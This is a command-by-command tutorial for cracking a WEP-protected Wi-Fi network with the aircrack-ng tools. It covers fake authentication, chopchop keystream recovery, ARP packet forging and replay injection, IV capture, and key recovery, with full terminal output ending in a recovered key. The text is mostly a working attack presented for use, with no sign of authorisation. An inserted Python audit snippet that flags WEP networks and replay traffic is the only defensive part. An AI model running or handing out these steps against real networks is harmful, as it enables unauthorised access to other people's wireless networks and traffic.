How to crack
Interface   Chipset    Driver
rausb0      Ralink     rt73
eth1        Centrino   ipw2200
We are going to use the rausb0 device!
2.
Start scanning with the command:
airodump-ng rausb0
The response to this is:
BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER  AUTH  ESSID
00:72:6B:69:0D:40   99        5      0    0  11  54   WEP  WEP           Grab
02:30:B4:65:3D:00  101        8      0    0   7  54.  OPN                PLOHL
BSSID              STATION            PWR   Rate  Lost  Packets  Probes
3.
In my example I have used the following target as practice:
BSSID = 00:72:6B:69:0D:40
Channel = 11
ESSID = Grab
Determine the MAC address of my ASUS USB WL-167g adapter by typing:
macchanger -s rausb0
The response is:
mac address rausb0 48:5b:39:34:71:39
MY MAC = 48:5b:39:34:71:39
4.
Put rausb0 into monitor mode on channel 11 with the command:
airmon-ng start rausb0 11
5.
I presumed that NO CLIENTS are attached to the WiFi, so associate with the TARGET WiFi by typing:
aireplay-ng -1 9000 -o 1 -q 10 -a 00:72:6B:69:0D:40 rausb0
The response should be:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
6.
Open a new TERMINAL window!
Now try to break into the WiFi by issuing the following command:
aireplay-ng -4 -b 00:72:6B:69:0D:40 -c FF:FF:FF:FF:FF:FF -h 48:5b:39:34:71:39 -p 0841 rausb0
The correct response should be as follows; when asked "Use this packet ?", answer 'y' (yes):
Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? y
In my example it took very little time, but be prepared to wait at least 30 minutes for this step.
Saving chosen packet in replay_src-0201-191639.cap
Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms
Offset 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 483ms
Offset 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 36ms
Offset 80 ( 9% done) | xor = CF | pt = 00 | 152 frames written in 456ms
Offset 79 (11% done) | xor = 05 | pt = 00 | 29 frames written in 87ms
Offset 78 (13% done) | xor = 69 | pt = 00 | 151 frames written in 454ms
Offset 77 (15% done) | xor = CA | pt = 00 | 24 frames written in 71ms
Offset 76 (17% done) | xor = 65 | pt = 00 | 129 frames written in 387ms
Offset 75 (19% done) | xor = 9E | pt = 00 | 36 frames written in 108ms
Offset 74 (21% done) | xor = 72 | pt = 00 | 39 frames written in 117ms
Offset 73 (23% done) | xor = 01 | pt = 00 | 146 frames written in 438ms
Offset 72 (25% done) | xor = 71 | pt = 00 | 83 frames written in 249ms
Offset 71 (26% done) | xor = A1 | pt = 00 | 43 frames written in 129ms
Offset 70 (28% done) | xor = 3E | pt = 00 | 98 frames written in 294ms
Offset 69 (30% done) | xor = BB | pt = 00 | 129 frames written in 387ms
Offset 68 (32% done) | xor = AE | pt = 00 | 248 frames written in 744ms
Offset 67 (34% done) | xor = FB | pt = 00 | 105 frames written in 315ms
Offset 66 (36% done) | xor = 43 | pt = 00 | 101 frames written in 303ms
Offset 65 (38% done) | xor = D4 | pt = 00 | 158 frames written in 474ms
Offset 64 (40% done) | xor = 16 | pt = 00 | 197 frames written in 591ms
Offset 63 (42% done) | xor = 7F | pt = 0C | 72 frames written in 217ms
Offset 62 (44% done) | xor = 1F | pt = 37 | 166 frames written in 497ms
Offset 61 (46% done) | xor = 5C | pt = A8 | 119 frames written in 357ms
Offset 60 (48% done) | xor = 9B | pt = C0 | 229 frames written in 687ms
Offset 59 (50% done) | xor = 91 | pt = 00 | 113 frames written in 339ms
Offset 58 (51% done) | xor = 25 | pt = 00 | 184 frames written in 552ms
Offset 57 (53% done) | xor = 94 | pt = 00 | 33 frames written in 99ms
Offset 56 (55% done) | xor = F3 | pt = 00 | 193 frames written in 579ms
Offset 55 (57% done) | xor = D6 | pt = 00 | 17 frames written in 51ms
Offset 54 (59% done) | xor = FA | pt = 00 | 81 frames written in 243ms
Offset 53 (61% done) | xor = EA | pt = 01 | 95 frames written in 285ms
Offset 52 (63% done) | xor = 5D | pt = 37 | 24 frames written in 72ms
Offset 51 (65% done) | xor = 33 | pt = A8 | 20 frames written in 59ms
Offset 50 (67% done) | xor = CC | pt = C0 | 97 frames written in 291ms
Offset 49 (69% done) | xor = 03 | pt = C9 | 188 frames written in 566ms
Offset 48 (71% done) | xor = 34 | pt = E5 | 48 frames written in 142ms
Offset 47 (73% done) | xor = 34 | pt = 77 | 64 frames written in 192ms
Offset 46 (75% done) | xor = 51 | pt = F4 | 253 frames written in 759ms
Offset 45 (76% done) | xor = 98 | pt = 40 | 109 frames written in 327ms
Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms
Offset 43 (80% done) | xor = 5E | pt = 01 | 194 frames written in 583ms
Offset 42 (82% done) | xor = AF | pt = 00 | 99 frames written in 296ms
Offset 41 (84% done) | xor = C4 | pt = 04 | 164 frames written in 492ms
Offset 40 (86% done) | xor = CE | pt = 06 | 69 frames written in 207ms
Offset 39 (88% done) | xor = 9D | pt = 00 | 137 frames written in 411ms
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...
The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor
Completed in 21s (2.29 bytes/s)
I have used several packets for one to succeed.
Eventually it will create and save the XOR file:
replay_dec-0201-191706.xor
7.
Now we have the packet's keystream (the XOR file) and can create an ARP request packet, which will be used
for INJECTION!
Use the command:
packetforge-ng -0 -a 00:72:6B:69:0D:40 -h 48:5b:39:34:71:39 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0201-191706.xor -w arp-request
The response should say that the packet arp-request has been created.
8.
Now attack the target wifi by issuing the following command:
aireplay-ng -2 -r arp-request rausb0
The response should be:
Saving chosen packet in arp-request
You should also start airodump-ng to capture replies.
Sent 4772 packets... (500 pps)
9.
Open a new terminal window and use it to capture the IVs.
Use the command:
airodump-ng -w myfile --bssid 00:72:6B:69:0D:40 --channel 11 --ivs rausb0
The response should be as follows, with the number under #Data increasing rapidly:
BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER  AUTH  ESSID
00:72:6B:69:0D:40   99        5    123   22  11  54   WEP  WEP           Grab
BSSID              STATION            PWR   Rate  Lost  Packets  Probes
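From a defender's side, the two airodump-ng tables on this page (the step 2 scan and the step 9 capture) are exactly what a wireless audit looks at: networks still on WEP or open, and a WEP network whose #/s column jumps with no client attached, which is what the ARP replay in step 8 produces. The parser and audit below are an added example, not part of the original page or of the aircrack-ng suite; the sample table is constructed (the WPA2 row is invented) and the frames-per-second threshold is an assumption to tune per site.

```python
import re
from dataclasses import dataclass

# Constructed sample, modelled on the airodump-ng tables shown on this page
SAMPLE = """\
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:72:6B:69:0D:40 99 5 123 22 11 54 WEP WEP Grab
02:30:B4:65:3D:00 101 8 0 0 7 54. OPN PLOHL
00:11:22:33:44:55 70 12 40 1 6 54 WPA2 CCMP PSK Office
BSSID STATION PWR Rate Lost Packets Probes
"""

MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)
WEAK_ENC = {"WEP", "OPN"}
INJECT_RATE = 10  # data frames/s; assumed threshold, tune per site


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    data: int
    per_sec: int
    enc: str
    essid: str


def parse_airodump(text):
    """Parse AP rows from airodump-ng's table; stop at the STATION header."""
    aps = []
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 2 and f[1] == "STATION":
            break  # client section starts; AP rows are done
        if len(f) < 8 or not MAC_RE.match(f[0]):
            continue  # header or blank line
        # CIPHER/AUTH may be empty (OPN rows), so take ESSID from the end
        essid = f[-1] if len(f) > 8 else ""
        aps.append(AccessPoint(f[0], int(f[5]), int(f[3]), int(f[4]), f[7], essid))
    return aps


def audit(aps):
    """Return (bssid, essid, finding) for weak encryption and likely replay injection."""
    findings = []
    for ap in aps:
        if ap.enc in WEAK_ENC:
            findings.append((ap.bssid, ap.essid, f"{ap.enc} network: migrate to WPA2/WPA3"))
        if ap.enc == "WEP" and ap.per_sec >= INJECT_RATE:
            findings.append((ap.bssid, ap.essid,
                             f"{ap.per_sec} data frames/s on WEP: possible ARP replay injection"))
    return findings
```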
10.
Open another window and run the CRACK
Issue the command:
aircrack-ng -z myfile*.ivs
The response should be:
[00:00:00] Tested 29 keys (got 78617 IVs)
KB   depth   byte(vote)
 0   0/  1   12(41472) F1(36864) 54(35840) 95(34816) 1D(34560) F0(34560) 75(34048) C1(33792)
 1   0/  1   34(40704) FB(35328) E6(34816) 23(34560) F5(34304) 1C(33792) 85(33792) 8E(33792)
 2   0/  3   56(39168) 07(37376) AC(35840) 0C(35328) DA(35328) 94(35072) 14(34816) 8D(34048)
 3   0/  1   78(40960) 42(36352) 19(35584) A0(35328) 11(34560) 17(34304) 2C(34304) 7C(34304)
 4   4/ 10   75(34304) D1(34048) 2B(33792) 60(33792) 81(33792) A9(33792) 40(33536) 73(33536)
KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%